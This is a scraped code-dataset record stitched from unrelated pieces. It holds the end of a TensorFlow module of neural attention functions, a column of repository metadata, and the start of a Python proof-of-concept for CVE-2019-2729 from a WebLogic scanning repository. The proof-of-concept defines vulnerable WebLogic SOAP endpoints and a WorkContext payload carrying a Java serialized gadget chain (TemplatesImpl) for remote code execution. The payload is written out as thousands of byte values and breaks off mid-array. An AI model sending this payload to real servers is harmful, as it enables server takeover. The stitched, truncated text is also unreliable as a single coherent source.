""" It is a implementation of the Luong et al. attention mechanism with general score. Based on the paper:
https://arxiv.org/abs/1508.04025 "Effective Approaches to Attention-based Neural Machine Translation"
Args:
key: A tensorflow tensor with dimensionality [None, None, key_size]
context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
hidden_size: Number of units in hidden representation
projected_align: Using dense layer for hidden representation of context.
If true, between input and attention mechanism insert a dense layer with dimensionality [hidden_size].
If false, a dense layer is not used.
Returns:
output: Tensor at the output with dimensionality [None, None, hidden_size]
"""
batch_size = tf.shape(context)[0]
max_num_tokens, token_size = context.get_shape().as_list()[-2:]
r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
# projected_key: [None, None, hidden_size]
projected_key = tf.layers.dense(key, hidden_size, kernel_initializer=xav())
r_projected_key = tf.reshape(projected_key, shape=[-1, hidden_size, 1])
# projected context: [None, None, hidden_size]
projected_context = \
tf.layers.dense(r_context, hidden_size, kernel_initializer=xav())
attn = tf.nn.softmax(tf.matmul(projected_context, r_projected_key), dim=1)
if projected_align:
log.info("Using projected attention alignment")
t_context = tf.transpose(projected_context, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, hidden_size])
else:
log.info("Using without projected attention alignment")
t_context = tf.transpose(r_context, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, token_size])
return output
def cs_general_attention(key, context, hidden_size, depth, projected_align=False):
""" It is a implementation of the Luong et al. attention mechanism with general score and the constrained softmax (csoftmax).
Based on the papers:
https://arxiv.org/abs/1508.04025 "Effective Approaches to Attention-based Neural Machine Translation"
https://andre-martins.github.io/docs/emnlp2017_final.pdf "Learning What's Easy: Fully Differentiable Neural Easy-First Taggers"
Args:
key: A tensorflow tensor with dimensionality [None, None, key_size]
context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
hidden_size: Number of units in hidden representation
depth: Number of csoftmax usages
projected_align: Using bidirectional lstm for hidden representation of context.
If true, beetween input and attention mechanism insert layer of bidirectional lstm with dimensionality [hidden_size].
If false, bidirectional lstm is not used.
Returns:
output: Tensor at the output with dimensionality [None, None, depth * hidden_size]
"""
if hidden_size % 2 != 0:
raise ValueError("hidden size must be dividable by two")
key_size = tf.shape(key)[-1]
batch_size = tf.shape(context)[0]
max_num_tokens, token_size = context.get_shape().as_list()[-2:]
r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
# projected_context: [None, max_num_tokens, token_size]
projected_context = tf.layers.dense(r_context, token_size,
kernel_initializer=xav(),
name='projected_context')
lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
(output_fw, output_bw), states = \
tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_fw_cell,
cell_bw=lstm_bw_cell,
inputs=projected_context,
dtype=tf.float32)
# bilstm_output: [-1, max_num_tokens, hidden_size]
bilstm_output = tf.concat([output_fw, output_bw], -1)
h_state_for_sketch = bilstm_output
if projected_align:
log.info("Using projected attention alignment")
h_state_for_attn_alignment = bilstm_output
aligned_h_state = csoftmax_attention.attention_gen_block(
h_state_for_sketch, h_state_for_attn_alignment, key, depth)
output = \
tf.reshape(aligned_h_state, shape=[batch_size, -1, depth * hidden_size])
else:
log.info("Using without projected attention alignment")
h_state_for_attn_alignment = projected_context
aligned_h_state = csoftmax_attention.attention_gen_block(
h_state_for_sketch, h_state_for_attn_alignment, key, depth)
output = \
tf.reshape(aligned_h_state, shape=[batch_size, -1, depth * token_size])
return output
def bahdanau_attention(key, context, hidden_size, projected_align=False):
""" It is a implementation of the Bahdanau et al. attention mechanism. Based on the paper:
https://arxiv.org/abs/1409.0473 "Neural Machine Translation by Jointly Learning to Align and Translate"
Args:
key: A tensorflow tensor with dimensionality [None, None, key_size]
context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
hidden_size: Number of units in hidden representation
projected_align: Using bidirectional lstm for hidden representation of context.
If true, beetween input and attention mechanism insert layer of bidirectional lstm with dimensionality [hidden_size].
If false, bidirectional lstm is not used.
Returns:
output: Tensor at the output with dimensionality [None, None, hidden_size]
"""
if hidden_size % 2 != 0:
raise ValueError("hidden size must be dividable by two")
batch_size = tf.shape(context)[0]
max_num_tokens, token_size = context.get_shape().as_list()[-2:]
r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
# projected_key: [None, None, hidden_size]
projected_key = tf.layers.dense(key, hidden_size, kernel_initializer=xav())
r_projected_key = \
tf.tile(tf.reshape(projected_key, shape=[-1, 1, hidden_size]),
[1, max_num_tokens, 1])
lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
(output_fw, output_bw), states = \
tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_fw_cell,
cell_bw=lstm_bw_cell,
inputs=r_context,
dtype=tf.float32)
# bilstm_output: [-1,self.max_num_tokens,_n_hidden]
bilstm_output = tf.concat([output_fw, output_bw], -1)
concat_h_state = tf.concat([r_projected_key, output_fw, output_bw], -1)
projected_state = \
tf.layers.dense(concat_h_state, hidden_size, use_bias=False,
kernel_initializer=xav())
score = \
tf.layers.dense(tf.tanh(projected_state), units=1, use_bias=False,
kernel_initializer=xav())
attn = tf.nn.softmax(score, dim=1)
if projected_align:
log.info("Using projected attention alignment")
t_context = tf.transpose(bilstm_output, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, hidden_size])
else:
log.info("Using without projected attention alignment")
t_context = tf.transpose(r_context, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, token_size])
return output
def light_bahdanau_attention(key, context, hidden_size, projected_align=False):
""" It is a implementation of the Bahdanau et al. attention mechanism. Based on the paper:
https://arxiv.org/abs/1409.0473 "Neural Machine Translation by Jointly Learning to Align and Translate"
Args:
key: A tensorflow tensor with dimensionality [None, None, key_size]
context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
hidden_size: Number of units in hidden representation
projected_align: Using dense layer for hidden representation of context.
If true, between input and attention mechanism insert a dense layer with dimensionality [hidden_size].
If false, a dense layer is not used.
Returns:
output: Tensor at the output with dimensionality [None, None, hidden_size]
"""
batch_size = tf.shape(context)[0]
max_num_tokens, token_size = context.get_shape().as_list()[-2:]
r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
# projected_key: [None, None, hidden_size]
projected_key = tf.layers.dense(key, hidden_size, kernel_initializer=xav())
r_projected_key = \
tf.tile(tf.reshape(projected_key, shape=[-1, 1, hidden_size]),
[1, max_num_tokens, 1])
# projected_context: [None, max_num_tokens, hidden_size]
projected_context = \
tf.layers.dense(r_context, hidden_size, kernel_initializer=xav())
concat_h_state = tf.concat([projected_context, r_projected_key], -1)
projected_state = \
tf.layers.dense(concat_h_state, hidden_size, use_bias=False,
kernel_initializer=xav())
score = \
tf.layers.dense(tf.tanh(projected_state), units=1, use_bias=False,
kernel_initializer=xav())
attn = tf.nn.softmax(score, dim=1)
if projected_align:
log.info("Using projected attention alignment")
t_context = tf.transpose(projected_context, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, hidden_size])
else:
log.info("Using without projected attention alignment")
t_context = tf.transpose(r_context, [0, 2, 1])
output = tf.reshape(tf.matmul(t_context, attn),
shape=[batch_size, -1, token_size])
return output
def cs_bahdanau_attention(key, context, hidden_size, depth, projected_align=False):
""" It is a implementation of the Bahdanau et al. attention mechanism. Based on the papers:
https://arxiv.org/abs/1409.0473 "Neural Machine Translation by Jointly Learning to Align and Translate"
https://andre-martins.github.io/docs/emnlp2017_final.pdf "Learning What's Easy: Fully Differentiable Neural Easy-First Taggers"
Args:
key: A tensorflow tensor with dimensionality [None, None, key_size]
context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
hidden_size: Number of units in hidden representation
depth: Number of csoftmax usages
projected_align: Using bidirectional lstm for hidden representation of context.
If true, beetween input and attention mechanism insert layer of bidirectional lstm with dimensionality [hidden_size].
If false, bidirectional lstm is not used.
Returns:
output: Tensor at the output with dimensionality [None, None, depth * hidden_size]
"""
if hidden_size % 2 != 0:
raise ValueError("hidden size must be dividable by two")
batch_size = tf.shape(context)[0]
max_num_tokens, token_size = context.get_shape().as_list()[-2:]
r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
# projected context: [None, max_num_tokens, token_size]
projected_context = tf.layers.dense(r_context, token_size,
kernel_initializer=xav(),
name='projected_context')
# projected_key: [None, None, hidden_size]
projected_key = tf.layers.dense(key, hidden_size, kernel_initializer=xav(),
name='projected_key')
r_projected_key = \
tf.tile(tf.reshape(projected_key, shape=[-1, 1, hidden_size]),
[1, max_num_tokens, 1])
lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
(output_fw, output_bw), states = \
tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_fw_cell,
cell_bw=lstm_bw_cell,
inputs=projected_context,
dtype=tf.float32)
# bilstm_output: [-1, max_num_tokens, hidden_size]
bilstm_output = tf.concat([output_fw, output_bw], -1)
concat_h_state = tf.concat([r_projected_key, output_fw, output_bw], -1)
if projected_align:
log.info("Using projected attention alignment")
h_state_for_attn_alignment = bilstm_output
aligned_h_state = csoftmax_attention.attention_bah_block(
concat_h_state, h_state_for_attn_alignment, depth)
output = \
tf.reshape(aligned_h_state, shape=[batch_size, -1, depth * hidden_size])
else:
log.info("Using without projected attention alignment")
h_state_for_attn_alignment = projected_context
aligned_h_state = csoftmax_attention.attention_bah_block(
concat_h_state, h_state_for_attn_alignment, depth)
output = \
tf.reshape(aligned_h_state, shape=[batch_size, -1, depth * token_size])
return output
| 50.337278
| 135
| 0.672623
| 2,245
| 17,014
| 4.872606
| 0.093987
| 0.063991
| 0.030716
| 0.031081
| 0.92833
| 0.921382
| 0.913063
| 0.911692
| 0.909681
| 0.909681
| 0
| 0.013804
| 0.237863
| 17,014
| 337
| 136
| 50.486647
| 0.829799
| 0.362525
| 0
| 0.895833
| 0
| 0
| 0.062798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.020833
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c762abd7912bc0d637a406357b7467d777accccb
| 357,618
|
py
|
Python
|
poc/CVE_2019_2729.py
|
rabbitmask/Weblogic-
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 1
|
2022-02-22T06:58:37.000Z
|
2022-02-22T06:58:37.000Z
|
poc/CVE_2019_2729.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | null | null | null |
poc/CVE_2019_2729.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import sys
import time
import requests
from config.config_requests import ua
VUL=['CVE-2019-2729']
path1 = '/wls-wsat/CoordinatorPortType'
path2 = '/_async/AsyncResponseService'
payload1 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="5010"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void><void index="39"><byte>2</byte></void><void index="40"><byte>0</byte></void><void index="41"><byte>0</byte></void><void index="42"><byte>120</byte></void><void index="43"><byte>114</byte></void><void index="44"><byte>0</byte></void><void index="45"><byte>17</byte></void><void index="46"><byte>106</byte></void><void index="47"><byte>97</byte></void><void index="48"><byte>118</byte></void><void index="49"><byte>97</byte></void><void index="50"><byte>46</byte></void><void index="51"><byte>117</byte></void><void index="52"><byte>116</byte></void><void index="53"><byte>105</byte></void><void index="54"><byte>108</byte></void><void index="55"><byte>46</byte></void><void index="56"><byte>72</byte></void><void index="57"><byte>97</byte></void><void index="58"><byte>115</byte></void><void index="59"><byte>104</byte></void><void index="60"><byte>83</byte></void><void index="61"><byte>101</byte></void><void index="62"><byte>116</byte></void><void index="63"><byte>-70</byte></void><void index="64"><byte>68</byte></void><void index="65"><byte>-123</byte></void><void index="66"><byte>-107</byte></void><void index="67"><byte>-106</byte></void><void index="68"><byte>-72</byte></void><void index="69"><byte>-73</byte></void><void index="70"><byte>52</byte></void><void index="71"><byte>3</byte></void><void index="72"><byte>0</byte></void><void index="73"><byte>0</byte></void><void index="74"><byte>120</byte></void><void index="75"><byte>112</byte></void><void index="76"><byte>119</byte></void><void index="77"><byte>12</byte></void><void index="78"><byte>0</byte></void><void index="79"><byte>0</byte></void><void index="80"><byte>0</byte></void><void index="81"><byte>16</byte></void><void index="82"><byte>63</byte></void><void index="83"><byte>64</byte></void><void index="84"><byte>0</byte></void><void index="85"><byte>0</byte></void><void index="86"><byte>0</byte></void><void index="87"><byte>0</byte></void><void index="88"><byte>0</byte></void><void index="89"><byte>2</byte></void><void index="90"><byte>115</byte></void><void index="91"><byte>114</byte></void><void index="92"><byte>0</byte></void><void index="93"><byte>58</byte></void><void index="94"><byte>99</byte></void><void index="95"><byte>111</byte></void><void index="96"><byte>109</byte></void><void index="97"><byte>46</byte></void><void index="98"><byte>115</byte></void><void index="99"><byte>117</byte></void><void index="100"><byte>110</byte></void><void index="101"><byte>46</byte></void><void index="102"><byte>111</byte></void><void index="103"><byte>114</byte></void><void index="104"><byte>103</byte></void><void index="105"><byte>46</byte></void><void index="106"><byte>97</byte></void><void index="107"><byte>112</byte></void><void index="108"><byte>97</byte></void><void index="109"><byte>99</byte></void><void index="110"><byte>104</byte></void><void index="111"><byte>101</byte></void><void index="112"><byte>46</byte></void><void index="113"><byte>120</byte></void><void index="114"><byte>97</byte></void><void index="115"><byte>108</byte></void><void index="116"><byte>97</byte></void><void index="117"><byte>110</byte></void><void index="118"><byte>46</byte></void><void index="119"><byte>105</byte></void><void index="120"><byte>110</byte></void><void index="121"><byte>116</byte></void><void index="122"><byte>101</byte></void><void index="123"><byte>114</byte></void><void index="124"><byte>110</byte></void><void index="125"><byte>97</byte></void><void index="126"><byte>108</byte></void><void index="127"><byte>46</byte></void><void index="128"><byte>120</byte></void><void index="129"><byte>115</byte></void><void index="130"><byte>108</byte></void><void index="131"><byte>116</byte></void><void index="132"><byte>99</byte></void><void index="133"><byte>46</byte></void><void index="134"><byte>116</byte></void><void index="135"><byte>114</byte></void><void index="136"><byte>97</byte></void><void index="137"><byte>120</byte></void><void index="138"><byte>46</byte></void><void index="139"><byte>84</byte></void><void index="140"><byte>101</byte></void><void index="141"><byte>109</byte></void><void index="142"><byte>112</byte></void><void index="143"><byte>108</byte></void><void index="144"><byte>97</byte></void><void index="145"><byte>116</byte></void><void index="146"><byte>101</byte></void><void index="147"><byte>115</byte></void><void index="148"><byte>73</byte></void><void index="149"><byte>109</byte></void><void index="150"><byte>112</byte></void><void index="151"><byte>108</byte></void><void index="152"><byte>9</byte></void><void index="153"><byte>87</byte></void><void index="154"><byte>79</byte></void><void index="155"><byte>-63</byte></void><void index="156"><byte>110</byte></void><void index="157"><byte>-84</byte></void><void index="158"><byte>-85</byte></void><void index="159"><byte>51</byte></void><void index="160"><byte>3</byte></void><void index="161"><byte>0</byte></void><void index="162"><byte>9</byte></void><void index="163"><byte>73</byte></void><void index="164"><byte>0</byte></void><void index="165"><byte>13</byte></void><void index="166"><byte>95</byte></void><void index="167"><byte>105</byte></void><void index="168"><byte>110</byte></void><void index="169"><byte>100</byte></void><void index="170"><byte>101</byte></void><void index="171"><byte>110</byte></void><void index="172"><byte>116</byte></void><void index="173"><byte>78</byte></void><void index="174"><byte>117</byte></void><void index="175"><byte>109</byte></void><void index="176"><byte>98</byte></void><void index="177"><byte>101</byte></void><void index="178"><byte>114</byte></void><void index="179"><byte>73</byte></void><void index="180"><byte>0</byte></void><void index="181"><byte>14</byte></void><void index="182"><byte>95</byte></void><void index="183"><byte>116</byte></void><void index="184"><byte>114</byte></void><void index="185"><byte>97</byte></void><void index="186"><byte>110</byte></void><void index="187"><byte>115</byte></void><void index="188"><byte>108</byte></void><void index="189"><byte>101</byte></void><void index="190"><byte>116</byte></void><void index="191"><byte>73</byte></void><void index="192"><byte>110</byte></void><void index="193"><byte>100</byte></void><void index="194"><byte>101</byte></void><void index="195"><byte>120</byte></void><void index="196"><byte>90</byte></void><void index="197"><byte>0</byte></void><void index="198"><byte>21</byte></void><void index="199"><byte>95</byte></void><void index="200"><byte>117</byte></void><void index="201"><byte>115</byte></void><void index="202"><byte>101</byte></void><void index="203"><byte>83</byte></void><void index="204"><byte>101</byte></void><void index="205"><byte>114</byte></void><void index="206"><byte>118</byte></void><void index="207"><byte>105</byte></void><void index="208"><byte>99</byte></void><void index="209"><byte>101</byte></void><void index="210"><byte>115</byte></void><void index="211"><byte>77</byte></void><void index="212"><byte>101</byte></void><void index="213"><byte>99</byte></void><void index="214"><byte>104</byte></void><void index="215"><byte>97</byte></void><void index="216"><byte>110</byte></void><void index="217"><byte>105</byte></void><void index="218"><byte>115</byte></void><void index="219"><byte>109</byte></void><void index="220"><byte>76</byte></void><void index="221"><byte>0</byte></void><void index="222"><byte>25</byte></void><void index="223"><byte>95</byte></void><void index="224"><byte>97</byte></void><void index="225"><byte>99</byte></void><void index="226"><byte>99</byte></void><void index="227"><byte>101</byte></void><void index="228"><byte>115</byte></void><void index="229"><byte>115</byte></void><void index="230"><byte>69</byte></void><void index="231"><byte>120</byte></void><void index="232"><byte>116</byte></void><void index="233"><byte>101</byte></void><void index="234"><byte>114</byte></void><void index="235"><byte>110</byte></void><void index="236"><byte>97</byte></void><void index="237"><byte>108</byte></void><void index="238"><byte>83</byte></void><void index="239"><byte>116</byte></void><void index="240"><byte>121</byte></void><void index="241"><byte>108</byte></void><void index="242"><byte>101</byte></void><void index="243"><byte>115</byte></void><void index="244"><byte>104</byte></void><void index="245"><byte>101</byte></void><void index="246"><byte>101</byte></void><void index="247"><byte>116</byte></void><void index="248"><byte>116</byte></void><void index="249"><byte>0</byte></void><void index="250"><byte>18</byte></void><void index="251"><byte>76</byte></void><void index="252"><byte>106</byte></void><void index="253"><byte>97</byte></void><void index="254"><byte>118</byte></void><void index="255"><byte>97</byte></void><void index="256"><byte>47</byte></void><void index="257"><byte>108</byte></void><void index="258"><byte>97</byte></void><void index="259"><byte>110</byte></void><void index="260"><byte>103</byte></void><void index="261"><byte>47</byte></void><void index="262"><byte>83</byte></void><void index="263"><byte>116</byte></void><void index="264"><byte>114</byte></void><void index="265"><byte>105</byte></void><void index="266"><byte>110</byte></void><void index="267"><byte>103</byte></void><void index="268"><byte>59</byte></void><void index="269"><byte>76</byte></void><void index="270"><byte>0</byte></void><void index="271"><byte>11</byte></void><void index="272"><byte>95</byte></void><void index="273"><byte>97</byte></void><void index="274"><byte>117</byte></void><void index="275"><byte>120</byte></void><void index="276"><byte>67</byte></void><void index="277"><byte>108</byte></void><void index="278"><byte>97</byte></void><void index="279"><byte>115</byte></void><void index="280"><byte>115</byte></void><void index="281"><byte>101</byte></void><void index="282"><byte>115</byte></void><void index="283"><byte>116</byte></void><void index="284"><byte>0</byte></void><void index="285"><byte>59</byte></void><void index="286"><byte>76</byte></void><void index="287"><byte>99</byte></void><void index="288"><byte>111</byte></void><void index="289"><byte>109</byte></void><void index="290"><byte>47</byte></void><void index="291"><byte>115</byte></void><void index="292"><byte>117</byte></void><void index="293"><byte>110</byte></void><void index="294"><byte>47</byte></void><void index="295"><byte>111</byte></void><void index="296"><byte>114</byte></void><void index="297"><byte>103</byte></void><void index="298"><byte>47</byte></void><void index="299"><byte>97</byte></void><void index="300"><byte>112</byte></void><void index="301"><byte>97</byte></void><void index="302"><byte>99</byte></void><void index="303"><byte>104</byte></void><void index="304"><byte>101</byte></void><void index="305"><byte>47</byte></void><void index="306"><byte>120</byte></void><void index="307"><byte>97</byte></void><void index="308"><byte>108</byte></void><void index="309"><byte>97</byte></void><void index="310"><byte>110</byte></void><void index="311"><byte>47</byte></void><void index="312"><byte>105</byte></void><void index="313"><byte>110</byte></void><void index="314"><byte>116</byte></void><void index="315"><byte>101</byte></void><void index="316"><byte>114</byte></void><void index="317"><byte>110</byte></void><void index="318"><byte>97</byte></void><void index="319"><byte>108</byte></void><void index="320"><byte>47</byte></void><void index="321"><byte>120</byte></void><void index="322"><byte>115</byte></void><void index="323"><byte>108</byte></void><void index="324"><byte>116</byte></void><void index="325"><byte>99</byte></void><void index="326"><byte>47</byte></void><void index="327"><byte>114</byte></void><void index="328"><byte>117</byte></void><void index="329"><byte>110</byte></void><void index="330"><byte>116</byte></void><void index="331"><byte>105</byte></void><void index="332"><byte>109</byte></void><void index="333"><byte>101</byte></void><void index="334"><byte>47</byte></void><void index="335"><byte>72</byte></void><void index="336"><byte>97</byte></void><void index="337"><byte>115</byte></void><void index="338"><byte>104</byte></void><void index="339"><byte>116</byte></void><void index="340"><byte>97</byte></void><void index="341"><byte>98</byte></void><void index="342"><byte>108</byte></void><void index="343"><byte>101</byte></void><void index="344"><byte>59</byte></void><void index="345"><byte>91</byte></void><void index="346"><byte>0</byte></void><void index="347"><byte>10</byte></void><void index="348"><byte>95</byte></void><void index="349"><byte>98</byte></void><void index="350"><byte>121</byte></void><void index="351"><byte>116</byte></void><void index="352"><byte>101</byte></void><void index="353"><byte>99</byte></void><void index="354"><byte>111</byte></void><void index="355"><byte>100</byte></void><void index="356"><byte>101</byte></void><void index="357"><byte>115</byte></void><void index="358"><byte>116</byte></void><void index="359"><byte>0</byte></void><void index="360"><byte>3</byte></void><void index="361"><byte>91</byte></void><void index="362"><byte>91</byte></void><void index="363"><byte>66</byte></void><void index="364"><byte>91</byte></void><void index="365"><byte>0</byte></void><void index="366"><byte>6</byte></void><void index="367"><byte>95</byte></void><void index="368"><byte>99</byte></void><void index="369"><byte>108</byte></void><void index="370"><byte>97</byte></void><void index="371"><byte>115</byte></void><void index="372"><byte>115</byte></void><void index="373"><byte>116</byte></void><void index="374"><byte>0</byte></void><void index="375"><byte>18</byte></void><void index="376"><byte>91</byte></void><void index="377"><byte>76</byte></void><void index="378"><byte>106</byte></void><void index="379"><byte>97</byte></void><void index="380"><byte>118</byte></void><void index="381"><byte>97</byte></void><void index="382"><byte>47</byte></void><void index="383"><byte>108</byte></void><void index="384"><byte>97</byte></void><void index="385"><byte>110</byte></void><void index="386"><byte>103</byte></void><void index="387"><byte>47</byte></void><void index="388"><byte>67</byte></void><void index="389"><byte>108</byte></void><void index="390"><byte>97</byte></void><void index="391"><byte>115</byte></void><void index="392"><byte>115</byte></void><void index="393"><byte>59</byte></void><void index="394"><byte>76</byte></void><void index="395"><byte>0</byte></void><void index="396"><byte>5</byte></void><void index="397"><byte>95</byte></void><void index="398"><byte>110</byte></void><void index="399"><byte>97</byte></void><void index="400"><byte>109</byte></void><void index="401"><byte>101</byte></void><void index="402"><byte>113</byte></void><void index="403"><byte>0</byte></void><void index="404"><byte>126</byte></void><void index="405"><byte>0</byte></void><void index="406"><byte>4</byte></void><void index="407"><byte>76</byte></void><void index="408"><byte>0</byte></void><void index="409"><byte>17</byte></void><void index="410"><byte>95</byte></void><void index="411"><byte>111</byte></void><void index="412"><byte>117</byte></void><void index="413"><byte>116</byte></void><void index="414"><byte>112</byte></void><void index="415"><byte>117</byte></void><void index="416"><byte>116</byte></void><void index="417"><byte>80</byte></void><void index="418"><byte>114</byte></void><void index="419"><byte>111</byte></void><void index="420"><byte>112</byte></void><void index="421"><byte>101</byte></void><void index="422"><byte>114</byte></void><void index="423"><byte>116</byte></void><void index="424"><byte>105</byte></void><void index="425"><byte>101</byte></void><void index="426"><byte>115</byte></void><void index="427"><byte>116</byte></void><void index="428"><byte>0</byte></void><void index="429"><byte>22</byte></void><void index="430"><byte>76</byte></void><void index="431"><byte>106</byte></void><void index="432"><byte>97</byte></void><void index="433"><byte>118</byte></void><void index="434"><byte>97</byte></void><void index="435"><byte>47</byte></void><void index="436"><byte>117</byte></void><void index="437"><byte>116</byte></void><void index="438"><byte>105</byte></void><void index="439"><byte>108</byte></void><void index="440"><byte>47</byte></void><void index="441"><byte>80</byte></void><void index="442"><byte>114</byte></void><void index="443"><byte>111</byte></void><void index="444"><byte>112</byte></void><void index="445"><byte>101</byte></void><void index="446"><byte>114</byte></void><void index="447"><byte>116</byte></void><void index="448"><byte>105</byte></void><void index="449"><byte>101</byte></void><void index="450"><byte>115</byte></void><void index="451"><byte>59</byte></void><void index="452"><byte>120</byte></void><void index="453"><byte>112</byte></void><void index="454"><byte>0</byte></void><void index="455"><byte>0</byte></void><void index="456"><byte>0</byte></void><void index="457"><byte>0</byte></void><void index="458"><byte>-1</byte></void><void index="459"><byte>-1</byte></void><void index="460"><byte>-1</byte></void><void index="461"><byte>-1</byte></void><void index="462"><byte>0</byte></void><void index="463"><byte>116</byte></void><void index="464"><byte>0</byte></void><void index="465"><byte>3</byte></void><void index="466"><byte>97</byte></void><void index="467"><byte>108</byte></void><void index="468"><byte>108</byte></void><void index="469"><byte>112</byte></void><void index="470"><byte>117</byte></void><void index="471"><byte>114</byte></void><void index="472"><byte>0</byte></void><void index="473"><byte>3</byte></void><void index="474"><byte>91</byte></void><void index="475"><byte>91</byte></void><void index="476"><byte>66</byte></void><void index="477"><byte>75</byte></void><void index="478"><byte>-3</byte></void><void index="479"><byte>25</byte></void><void index="480"><byte>21</byte></void><void index="481"><byte>103</byte></void><void index="482"><byte>103</byte></void><void index="483"><byte>-37</byte></void><void index="484"><byte>55</byte></void><void index="485"><byte>2</byte></void><void index="486"><byte>0</byte></void><void index="487"><byte>0</byte></void><void index="488"><byte>120</byte></void><void index="489"><byte>112</byte></void><void index="490"><byte>0</byte></void><void index="491"><byte>0</byte></void><void index="492"><byte>0</byte></void><void index="493"><byte>2</byte></void><void index="494"><byte>117</byte></void><void index="495"><byte>114</byte></void><void index="496"><byte>0</byte></void><void index="497"><byte>2</byte></void><void index="498"><byte>91</byte></void><void index="499"><byte>66</byte></void><void index="500"><byte>-84</byte></void><void index="501"><byte>-13</byte></void><void index="502"><byte>23</byte></void><void index="503"><byte>-8</byte></void><void index="504"><byte>6</byte></void><void index="505"><byte>8</byte></void><void index="506"><byte>84</byte></void><void index="507"><byte>-32</byte></void><void index="508"><byte>2</byte></void><void index="509"><byte>0</byte></void><void index="510"><byte>0</byte></void><void index="511"><byte>120</byte></void><void index="512"><byte>112</byte></void><void index="513"><byte>0</byte></void><void index="514"><byte>0</byte></void><void index="515"><byte>14</byte></void><void index="516"><byte>29</byte></void><void index="517"><byte>-54</byte></void><void index="518"><byte>-2</byte></void><void index="519"><byte>-70</byte></void><void index="520"><byte>-66</byte></void><void index="521"><byte>0</byte></void><void index="522"><byte>0</byte></void><void index="523"><byte>0</byte></void><void index="524"><byte>50</byte></void><void index="525"><byte>0</byte></void><void index="526"><byte>-70</byte></void><void index="527"><byte>10</byte></void><void index="528"><byte>0</byte></void><void index="529"><byte>3</byte></void><void index="530"><byte>0</byte></void><void index="531"><byte>34</byte></void><void index="532"><byte>7</byte></void><void index="533"><byte>0</byte></void><void index="534"><byte>-72</byte></void><void index="535"><byte>7</byte></void><void index="536"><byte>0</byte></void><void index="537"><byte>37</byte></void><void index="538"><byte>7</byte></void><void index="539"><byte>0</byte></void><void index="540"><byte>38</byte></void><void index="541"><byte>1</byte></void><void index="542"><byte>0</byte></void><void index="543"><byte>16</byte></void><void 